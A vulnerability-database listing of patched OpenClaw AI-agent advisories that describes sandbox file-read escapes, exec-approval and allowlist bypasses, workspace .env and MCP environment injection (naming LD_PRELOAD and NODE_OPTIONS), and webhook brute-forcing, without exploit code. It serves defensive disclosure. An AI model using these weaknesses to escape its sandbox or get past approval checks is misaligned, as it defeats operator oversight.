OpenClaw's Nextcloud Talk webhook missing rate limiting on shared secret authentication ## Summary Nextcloud Talk webhook signature failures were not throttled even though the integration relies on an operator-configured shared secret that may be weak. ## Impact An attacker who could reach the webhook endpoint could brute-force weak secrets online and then forge inbound webhook events. ## Affected Component `extensions/nextcloud-talk/src/monitor.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `e403decb6e` (`nextcloud-talk: throttle repeated webhook auth failures`). OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-pdmd-a4fg-8fcg
Aliases: CVE-2026-43531 GHSA-7wv4-cc7p-jhxc |
OpenClaw: Workspace .env could inject OpenClaw runtime-control variables ## Summary Workspace .env could inject OpenClaw runtime-control variables. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.9` - Patched versions: `>= 2026.4.9` ## Impact A malicious workspace `.env` file could set OpenClaw runtime-control variables affecting update sources, gateway URLs, ClawHub resolution, browser executable paths, and related behavior. ## Technical Details The fix blocks OpenClaw runtime-control keys and key families from workspace `.env` loading. ## Fix The issue was fixed in #62660. The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `dbfcef319618158fa40b31cdac386ea34c392c0c` - PR: #62660 ## Release Process Note Users should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab for reporting this issue. |
Affected by 59 other vulnerabilities. |
|
VCID-psms-gauf-tkbz
Aliases: CVE-2026-42420 GHSA-ccx3-fw7q-rr2r |
OpenClaw: Multiple Code Paths Missing Base64 Pre-Allocation Size Checks ## Impact Multiple Code Paths Missing Base64 Pre-Allocation Size Checks. Several base64 decode paths could allocate before enforcing decoded-size limits. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<=v2026.4.2` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @zsxsoft and @KeenSecurityLab for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-q6ne-sw1r-xkd1
Aliases: CVE-2026-41358 GHSA-qm77-8qjp-4vcm |
OpenClaw: Slack thread context could include messages from non-allowlisted senders ## Summary Before OpenClaw 2026.4.2, Slack thread starter and thread-history context fetched through the API was not filtered by the effective sender allowlist. Messages from non-allowlisted senders could still enter the agent context when an allowlisted user replied in the same thread. ## Impact A Slack deployment that relied on sender allowlists could still feed non-allowlisted thread content into the model context through thread history. This was a sender-access-control bypass on Slack thread context, not a direct channel-auth bypass. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `ac5bc4fb37becc64a2ec314864cca1565e921f2d` — filter Slack thread context by the effective allowlist ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-q9jf-srt4-fbcg
Aliases: GHSA-fqrj-m88p-qf3v |
OpenClaw: Zalo replay dedupe cache could suppress events across authenticated webhook targets ## Summary Before OpenClaw 2026.3.31, the Zalo webhook replay-dedupe cache was shared across authenticated webhook targets and keyed too broadly. In multi-account deployments, a replay seen on one account could suppress a legitimate event on another account if `event_name` and `message_id` matched. ## Impact An attacker who controlled one authenticated Zalo webhook path in a multi-account gateway deployment could cause silent message suppression on a different Zalo account sharing that gateway. This was an availability issue; it did not provide cross-account authentication or data access. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `>= 2026.2.19, < 2026.3.31` - Patched versions: `>= 2026.3.31` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `4d038bb242c11f39e45f6a4bde400e5fd42e4ebf` — scope webhook replay dedupe per target - `7cea7c29705b188b464cc9cdc107c275b94b2a72` — follow-up hardening to scope replay dedupe by path and account ## Release Process Note The initial fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains follow-up hardening for the same surface. Thanks @nexrin for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-qedr-a3ay-v3gx
Aliases: CVE-2026-42433 GHSA-7jp6-r74r-995q |
OpenClaw: Matrix profile config persistence was reachable from operator.write message tools ## Summary Matrix profile config persistence was reachable from operator.write message tools. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.10` - Patched versions: `>= 2026.4.10` ## Impact Gateway `operator.write` message-tool paths could reach Matrix profile persistence that should have required admin-level authority. ## Technical Details The fix gates Matrix profile updates for non-owner message-tool runs and prevents write-scoped callers from mutating persistent profile config. ## Fix The issue was fixed in #62662. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `fe0f686c9228fffcec6de4011da45e69a6e23e54` - PR: #62662 ## Release Process Note Users should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zpbrent and @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 42 other vulnerabilities. |
|
VCID-qjss-tvgk-3ubk
Aliases: GHSA-ch86-pxr9-j9h9 |
Duplicate Advisory: OpenClaw: Gemini OAuth exposed the PKCE verifier through the OAuth state parameter ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-9jpj-g8vv-j5mf. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.4.2 reuses the PKCE verifier as the OAuth state parameter in the Gemini OAuth flow, exposing it through the redirect URL. Attackers who capture the redirect URL can obtain both the authorization code and PKCE verifier, defeating PKCE protection and enabling token redemption. |
Affected by 80 other vulnerabilities. |
|
VCID-qjvc-etb4-qbfv
Aliases: CVE-2026-41363 GHSA-qf48-qfv4-jjm9 |
OpenClaw: Feishu extension resolveUploadInput bypasses file-system sandbox and allows arbitrary file reads via upload_image ## Summary Feishu upload path resolution could read files outside the configured localRoots sandbox before handing them to the upload path. ## Impact A tool caller constrained to workspace or localRoots paths could exfiltrate arbitrary host files through Feishu upload actions. ## Affected Component `extensions/feishu/src/docx.ts` ## Fixed Versions - Affected: `>= 2026.2.6, <= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `764394c78b` (`fix: enforce localRoots sandbox on Feishu docx upload file reads`). |
Affected by 150 other vulnerabilities. |
|
VCID-r5bw-c2py-9udf
Aliases: CVE-2026-41383 GHSA-m34q-h93w-vg5x |
OpenClaw: OpenShell mirror mode could delete arbitrary remote directories when roots were mis-scoped ## Summary Before OpenClaw 2026.4.2, the OpenShell mirror backend accepted arbitrary absolute `remoteWorkspaceDir` and `remoteAgentWorkspaceDir` values. In mirror mode, those paths were then used as the target of remote cleanup and overwrite operations. ## Impact If an attacker could influence those OpenShell config values, mirror sync could delete the contents of an unintended remote directory and replace them with uploaded workspace data. This was a destructive remote-path bug in the mirror-sync path. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `b21c9840c2e38f4bb338d031511b479d5f07ca25` — constrain OpenShell mirror sync roots ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @jufeng123768 for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-r9y1-z2ax-z3e2
Aliases: GHSA-59xc-5v89-r7pr |
Duplicate Advisory: OpenClaw: Synology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Webhook Token ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-mf5g-6r6f-ghhm. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.25 contains a pre-authentication rate-limit bypass vulnerability in webhook token validation that allows attackers to brute-force weak webhook secrets. The vulnerability exists because invalid webhook tokens are rejected without throttling repeated authentication attempts, enabling attackers to guess weak tokens through rapid successive requests. |
Affected by 150 other vulnerabilities. |
|
VCID-rr6t-1193-ybgz
Aliases: CVE-2026-44995 GHSA-mj59-h3q9-ghfh |
OpenClaw: MCP stdio server env could load dangerous startup variables from workspace config ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact Workspace MCP stdio configuration could pass dangerous process-startup environment variables such as `NODE_OPTIONS`, `LD_PRELOAD`, or `BASH_ENV` to the spawned MCP server process. In a malicious workspace, this could make the MCP child load attacker-controlled code when the operator starts a session that uses that MCP server. The impact is limited to local/workspace trust boundaries and requires the operator to run OpenClaw in a workspace containing the malicious MCP configuration. Severity is therefore medium, not high/critical. ## Fix OpenClaw now filters MCP stdio environment entries through the host environment safety denylist before spawning stdio MCP servers. Fix commits: - `62fa5071896e95edc7f67d1cebc70a2859e283af` - `85d86ebc4bf3d2226d39d132a484f4f7a299fa1b` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-ry1r-br3q-2uaw
Aliases: CVE-2026-44118 GHSA-r6xh-pqhr-v4xh |
OpenClaw: MCP loopback owner context is derived from server-issued bearer tokens ## Summary MCP loopback owner context is derived from server-issued bearer tokens. ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.21 - Fixed version: 2026.4.22 ## Impact The loopback MCP path accepted spoofable owner-context metadata from request headers, which could allow a non-owner loopback client to present itself as owner for owner-gated operations. ## Fix The MCP loopback runtime now issues separate owner and non-owner bearer tokens and derives senderIsOwner exclusively from which token authenticated the request. The spoofable sender-owner header is no longer emitted or trusted. ## Fix Commit(s) - 3cb1a56bfc9579a0f2336f9cfa12a8a744332a19 ## Verification - The fix commit is contained in the public v2026.4.22 tag. - openclaw@2026.4.22 is published on npm and the compiled package contains the fix. - Focused regression coverage for this path passed before publication. OpenClaw thanks @VladimirEliTokarev for reporting. |
Affected by 3 other vulnerabilities. |
|
VCID-s3wz-3yzf-ybhz
Aliases: CVE-2026-41337 GHSA-89r3-6x4j-v7wf |
OpenClaw: Voice-call Plivo replay mutates in-process callback origin before replay rejection ## Summary Voice-call Plivo replay mutates in-process callback origin before replay rejection ## Current Maintainer Triage - Status: narrow - Normalized severity: low - Assessment: v2026.3.28 can still mutate Plivo callback origin before replay rejection, but this needs a captured valid callback for a live call so medium is overstated. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `efe9183f9d2fd5e01c8068fa01f4a07a58a63c0b` — 2026-03-31T19:50:35+09:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @zsxsoft for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-sja9-6t41-hud8
Aliases: GHSA-j9pv-rrcj-6pfx |
OpenClaw: SSH-based sandbox backends pass unsanitized process.env to child processes ## Summary SSH-based sandbox backends pass unsanitized process.env to child processes ## Current Maintainer Triage - Status: narrow - Normalized severity: low - Assessment: Shipped SSH sandbox paths leaked unsanitized env into local SSH child processes, but remote leakage needs non-default SSH env forwarding, so lower to low. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `cfe14459531e002a1c61c27d97ec7dc8aecddc1f` — 2026-03-30T20:05:57+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-t2ve-xemk-mqa9
Aliases: CVE-2026-44112 GHSA-wppj-c6mr-83jj |
OpenClaw: OpenShell FS bridge writes stay pinned to the sandbox mount root ## Summary OpenShell FS bridge writes stay pinned to the sandbox mount root ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.21 - Fixed version: 2026.4.22 ## Impact A time-of-check/time-of-use race around OpenShell sandbox filesystem writes could let a symlink swap redirect a write outside the intended local mount root. ## Fix OpenShell write paths now validate the canonical target against the mount root, reject unsafe symlink parents and symlink leaves for writes, and use root-scoped write helpers before syncing to the remote sandbox. ## Fix Commit(s) - 7be82d4fd1193bcb7e44ee38838f00bf924ffa76 ## Verification - The fix commit is contained in the public v2026.4.22 tag. - openclaw@2026.4.22 is published on npm and the compiled package contains the fix. - Focused regression coverage for this path passed before publication. Thanks @VladimirEliTokarev for reporting. |
Affected by 3 other vulnerabilities. |
|
VCID-t2yy-9ume-t7be
Aliases: CVE-2026-43535 GHSA-jwrq-8g5x-5fhm |
OpenClaw: Collect-mode queue batches could reuse the last sender authorization context ## Summary Collect-mode queue batches could reuse the last sender authorization context. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.14` - Patched versions: `>= 2026.4.14` ## Impact Collect-mode queued messages from different senders could be drained as one batch using the final sender's authorization context, allowing earlier messages to inherit a more privileged context. ## Technical Details The fix splits collect-mode batches by sender authorization context before dispatch, preserving each message's own trust state. ## Fix The issue was fixed in #66024. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `43d4be902755c970b3d15608679761877718da69` - PR: #66024 ## Release Process Note Users should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 30 other vulnerabilities. |
|
VCID-t991-75e7-ykdv
Aliases: CVE-2026-41405 GHSA-p464-m8x6-vhv8 |
OpenClaw: MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion ## Summary MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: v2026.3.28 still parses Teams JSON after only a Bearer-prefix gate and before real JWT validation, and the auth-before-parse fix is not yet shipped. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `3834d47099dd13c8244ed6de8b9ea9855c553623` — 2026-03-30T13:46:40+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-te8f-snty-j7hh
Aliases: GHSA-8f9r-gr6r-x63q |
Duplicate Advisory: OpenClaw: Feishu webhook reads and parses unauthenticated request bodies before signature validation ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-3h52-cx59-c456. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.25 parses JSON request bodies before validating webhook signatures, allowing unauthenticated attackers to force resource-intensive parsing operations. Remote attackers can send malicious webhook requests to trigger denial of service by exhausting server resources through forced JSON parsing before signature rejection. |
Affected by 150 other vulnerabilities. |
|
VCID-tf28-1z2z-5yfn
Aliases: CVE-2026-41375 GHSA-h2v7-xc88-xx8c |
OpenClaw: `/phone arm`/`/phone disarm` Bypasses `operator.admin` Scope Check for External Channels ## Summary `/phone arm`/`/phone disarm` Bypasses `operator.admin` Scope Check for External Channels ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: Maintainers accepted this issue, fixed it in aa66ae1fc797d3298cc409ed2c5da69a89950a45 on 2026-03-27, and that fix shipped in v2026.3.28, so normalize it as a fixed released draft rather than a close-by-trust-model call. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.24` - Patched versions: `>= 2026.3.28` - First stable tag containing the fix: `v2026.3.28` ## Fix Commit(s) - `aa66ae1fc797d3298cc409ed2c5da69a89950a45` — 2026-03-27T20:35:42Z ## Release Process Note - The fix is already present in released version `2026.3.28`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @AntAISecurityLab for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-tk9h-nqrz-uugp
Aliases: CVE-2026-35661 GHSA-j4c9-w69r-cw33 |
OpenClaw: Telegram DM-Scoped Inline Button Callbacks Bypass DM Pairing and Mutate Session State ## Summary Telegram DM-Scoped Inline Button Callbacks Bypass DM Pairing and Mutate Session State ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Telegram callback queries from direct messages previously used weaker callback-only authorization and could mutate session state without satisfying normal DM pairing. Commit `269282ac69ab6030d5f30d04822668f607f13065` enforces DM authorization for callbacks. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `269282ac69ab6030d5f30d04822668f607f13065`. ## Fix Commit(s) - `269282ac69ab6030d5f30d04822668f607f13065` |
Affected by 150 other vulnerabilities. |
|
VCID-u1ru-vdfp-x3hu
Aliases: CVE-2026-33577 GHSA-2x4x-cc5g-qmmg |
OpenClaw: node.pair.approve missing callerScopes validation allows low-privilege operator to approve malicious nodes ## Summary The node pairing approval path did not consistently enforce that the approving caller already held every scope requested by the node. ## Impact A lower-privileged operator could approve a pending node request for broader scopes and extend privileges onto the paired node. ## Affected Component `src/infra/node-pairing.ts, src/gateway/server-methods/nodes.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `4d7cc6bb4f` (`gateway: restrict node pairing approvals`). OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-u6hw-ffpj-4yd9
Aliases: CVE-2026-35647 GHSA-9wqx-g2cw-vc7r |
OpenClaw: Matrix Verification Notices Bypass Matrix DM Policy and Reply to Unpaired DM Peers ## Summary Matrix Verification Notices Bypass Matrix DM Policy and Reply to Unpaired DM Peers ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Matrix verification notices previously bypassed DM access checks and could reply to peers that were unpaired or otherwise outside the allowed DM policy. Commit `2383daf5c4a4e08d9553e0e949552ad755ef9ec2` gates verification notices on DM access before sending. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `2383daf5c4a4e08d9553e0e949552ad755ef9ec2`. ## Fix Commit(s) - `2383daf5c4a4e08d9553e0e949552ad755ef9ec2` | There are no reported fixed by versions. |
|
VCID-u9cw-crg5-1kbs
Aliases: CVE-2026-41303 GHSA-98hh-7ghg-x6rq |
OpenClaw: Discord text `/approve` bypasses `channels.discord.execApprovals.approvers` and allows non-approvers to resolve pending exec approvals ## Summary Discord text approval commands resolved pending exec approvals without honoring the configured approver allowlist. ## Impact A Discord user who was allowed to send commands but was not in the approver list could still approve pending host execution. ## Affected Component `extensions/discord/src/exec-approvals.ts, src/auto-reply/reply/commands-approve.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `355abe5eba` (`Discord: enforce approver checks for text approvals`). |
Affected by 150 other vulnerabilities. |
|
VCID-una1-gxkk-t3bp
Aliases: CVE-2026-41295 GHSA-2qrv-rc5x-2g2h |
OpenClaw: Untrusted workspace channel shadows could execute during built-in channel setup ## Summary Before OpenClaw 2026.4.2, built-in channel setup and login could resolve an untrusted workspace channel shadow before the plugin was explicitly trusted. A malicious workspace plugin that claimed a bundled channel id could execute during channel setup even while still disabled. ## Impact A cloned workspace could turn channel setup for a built-in channel into unintended in-process code execution from an untrusted workspace plugin. This bypassed the intended workspace-plugin trust boundary during setup and login. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `53c29df2a9eb242a70d0ff29f3d1e67c8d6801f0` — ignore untrusted workspace channel shadows during setup resolution ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @zpbrent for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-utv2-tyje-kfht
Aliases: GHSA-rc8f-r29c-chr6 |
Duplicate Advisory: OpenClaw: BlueBubbles Webhook Missing Rate Limiting Enables Brute-Force Password Guessing ## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-xq8g-hgh6-87hv. This link is maintained to preserve external references. ## Original Description OpenClaw before 2026.3.25 contains a missing rate limiting vulnerability in webhook authentication that allows attackers to brute-force weak webhook passwords without throttling. Remote attackers can repeatedly submit incorrect password guesses to the webhook endpoint to compromise authentication and gain unauthorized access. | There are no reported fixed by versions. |
|
VCID-uy97-p1ex-y7df
Aliases: CVE-2026-41348 GHSA-rvvf-6vh3-9j43 |
OpenClaw: Discord Slash Commands Bypass Group DM Channel Allowlist ## Summary Discord Slash Commands Bypass Group DM Channel Allowlist ## Current Maintainer Triage - Status: narrow - Normalized severity: moderate - Assessment: v2026.3.28 native Discord slash and autocomplete paths still skip the group-DM allowlist, but impact is limited to already-authorized Discord users bypassing a channel restriction rather than crossing a stronger trust boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `8fdb19676ab44cf85d47ee13c578195f2e527591` — 2026-03-30T11:17:36-06:00 OpenClaw thanks @nexrin for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-v9cd-65tf-p3f8
Aliases: CVE-2026-41398 GHSA-4p4f-fc8q-84m3 |
OpenClaw: iOS A2UI bridge trusted generic local-network pages for agent.request dispatch ## Summary Before OpenClaw 2026.4.2, the iOS A2UI bridge treated generic local-network pages as trusted bridge origins. A page loaded from a local-network or tailnet host could trigger agent.request dispatch without the stricter trusted-canvas origin check. ## Impact A loaded attacker-controlled page could inject unauthorized non-owner agent.request runs into the active iOS node session, polluting session state and consuming budget. The demonstrated impact did not include owner-only actions or arbitrary host execution. ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.1 - Patched versions: >= 2026.4.2 - Latest published npm version: 2026.4.1 ## Fix Commit(s) 49d08382a90f71dabe2877b3f6729ad85f808d57 — restrict A2UI action dispatch to trusted canvas URLs ## Release Process Note The fix is present on main and is staged for OpenClaw 2026.4.2. Publish this advisory after the 2026.4.2 npm release is live. Thanks [@nexrin](https://github.com/nexrin) for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-vfbb-bpy9-87ey
Aliases: CVE-2026-43570 GHSA-35mw-5vvr-vrxc |
OpenClaw contains a symlink traversal vulnerability OpenClaw versions 2026.3.22 before 2026.4.5 contain a symlink traversal vulnerability in remote marketplace repository path handling that allows attackers to escape the expected repository root. Attackers can exploit this by providing crafted symlink paths to access files outside the intended repository directory. |
Affected by 81 other vulnerabilities. |
|
VCID-vktg-77tu-vycv
Aliases: GHSA-58q2-7r52-jq62 |
OpenClaw: Path traversal via inbound channel attachment path in ACP dispatch allows arbitrary file read ## Summary Path traversal via inbound channel attachment path in ACP dispatch allows arbitrary file read ## Current Maintainer Triage - Normalized severity: medium - Assessment: v2026.3.28 ACP dispatch still reads attachment paths outside the guarded attachment-cache or root checks, and the root-enforcement fix is not yet shipped. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `566fb73d9da2d73c0be0d9b8e5b762e4dcd8e81d` — 2026-03-30T14:04:02+01:00 OpenClaw thanks @north-echo for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-vm8g-hrvu-quhm
Aliases: CVE-2026-35654 GHSA-rf6h-5gpw-qrgq |
OpenClaw: MS Teams Feedback Invocation Bypasses Sender Allowlists and Records Unauthorized Session Feedback ## Summary MS Teams Feedback Invoke Bypasses Sender Allowlists and Records Unauthorized Session Feedback ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Microsoft Teams feedback invokes previously bypassed sender authorization and could record feedback or trigger reflection for unauthorized senders. Commit `c5415a474bb085404c20f8b312e436997977b1ea` applies the same DM and group authorization checks to feedback invokes. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `c5415a474bb085404c20f8b312e436997977b1ea`. ## Fix Commit(s) - `c5415a474bb085404c20f8b312e436997977b1ea` |
Affected by 150 other vulnerabilities. |
|
VCID-vqrj-z6tx-rff2
Aliases: CVE-2026-41355 GHSA-42mx-vp8m-j7qh |
OpenClaw: OpenShell `mirror` mode can convert untrusted sandbox files into explicitly enabled workspace hooks and execute them on the host during gateway startup ## Summary OpenShell `mirror` mode can convert untrusted sandbox files into explicitly enabled workspace hooks and execute them on the host during gateway startup ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: Real on shipped <=2026.3.22 OpenShell mirror sync, but exploit needs mirror mode plus hooks enabled plus explicit hook opt-in plus restart, so high is overstated even though the direct fix shipped in v2026.3.28. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.24` - Patched versions: `>= 2026.3.28` - First stable tag containing the fix: `v2026.3.28` ## Fix Commit(s) - `c02ee8a3a4cb390b23afdf21317aa8b2096854d1` — 2026-03-25T19:59:07Z ## Release Process Note - The fix is already present in released version `2026.3.28`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @tdjackey for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-vtqt-bgz7-yub6
Aliases: GHSA-gm9m-x74r-8whg |
Duplicate Advisory: OpenClaw's Nextcloud Talk webhook missing rate limiting on shared secret authentication ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-9528-x887-j2fp. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.28 contains a missing rate limiting vulnerability in the Nextcloud Talk webhook authentication that allows attackers to brute-force weak shared secrets. Attackers who can reach the webhook endpoint can exploit this to forge inbound webhook events by repeatedly attempting authentication without throttling. |
Affected by 150 other vulnerabilities. |
|
VCID-vv2u-u7mn-rfe1
Aliases: GHSA-qp56-gp47-jwj3 |
Duplicate Advisory: OpenClaw: Feishu extension resolveUploadInput bypasses file-system sandbox and allows arbitrary file reads via upload_image ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-qf48-qfv4-jjm9. This link is maintained to preserve external references. ### Original Description OpenClaw versions 2026.2.6 through 2026.3.24 contain a path traversal vulnerability in the Feishu extension resolveUploadInput function that bypasses file-system sandbox restrictions. Attackers can exploit improper path resolution during upload_image operations to read arbitrary files outside configured localRoots boundaries. |
Affected by 150 other vulnerabilities. |
|
VCID-vx5d-3d98-7kf3
Aliases: CVE-2026-41336 GHSA-3qpv-xf3v-mm45 |
OpenClaw: Workspace `.env` can override the bundled hooks root and load attacker hook code ## Summary Workspace `.env` can override the bundled hooks root and load attacker hook code ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_HOOKS_DIR, which can replace trusted default-on bundled hooks from an untrusted workspace. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `330a9f98cb29c79b1c16a2117e03d6276a0d6289` — 2026-03-31T19:25:12+09:00 OpenClaw thanks @nexrin for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-vy8v-np82-r3b5
Aliases: CVE-2026-41916 GHSA-68x5-xx89-w9mm |
OpenClaw: resolvedAuth closure becomes stale after config reload ## Impact resolvedAuth closure becomes stale after config reload. After a config reload, newly accepted gateway connections could continue using stale resolved auth state. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-vz7k-r7c4-ebfg
Aliases: GHSA-j4c5-89f5-f3pm |
